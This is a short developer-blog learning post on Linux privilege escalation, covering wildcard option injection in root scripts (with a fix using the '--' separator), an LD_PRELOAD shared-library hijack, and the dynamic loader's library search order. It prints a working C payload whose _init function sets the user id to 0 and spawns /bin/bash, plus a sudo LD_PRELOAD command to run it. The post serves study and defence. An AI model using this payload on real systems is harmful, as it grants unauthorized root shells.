DEV Community

Devon Argent
Devon Argent

Posted on

Day 18: The Danger of Wildcards (*) & Library Injection πŸ•΅οΈβ€β™‚οΈ

#cybersecurity #infosec #linux #security

πŸ› οΈ The "Option Injection" Breakdown

1. When Filenames become Commands

When a script runs rsync -av * /backup/, the shell expands the * into a list of all files in the directory. If an attacker creates a file named -e, rsync interprets it as an option, not a file.

  • The Exploit: Using -e or --checkpoint-action to force the program to execute a malicious script as root.
  • The Fix: Never use naked wildcards in root scripts. Always use absolute paths or the -- separator to signal the end of command options.

2. Hijacking the Dynamic Linker (LD_PRELOAD)

I practiced forcing a program to load a malicious .so (shared object) file before its legitimate libraries. By defining a void _init() function in C, I can execute code the moment the library is loaded.

// root.c
void _init() {
    setuid(0); 
    system("/bin/bash");
}
Enter fullscreen mode Exit fullscreen mode

Execution: sudo LD_PRELOAD=/tmp/root.so

3. Library Search Order

Understanding how the loader finds libraries is key to Shared Library Hijacking. The typical order is:

  1. RPATH / RUNPATH
  2. LD_LIBRARY_PATH
  3. /etc/ld.so.cache
  4. /lib & /usr/lib

Follow my journey: #1HourADayJourney

Top comments (0)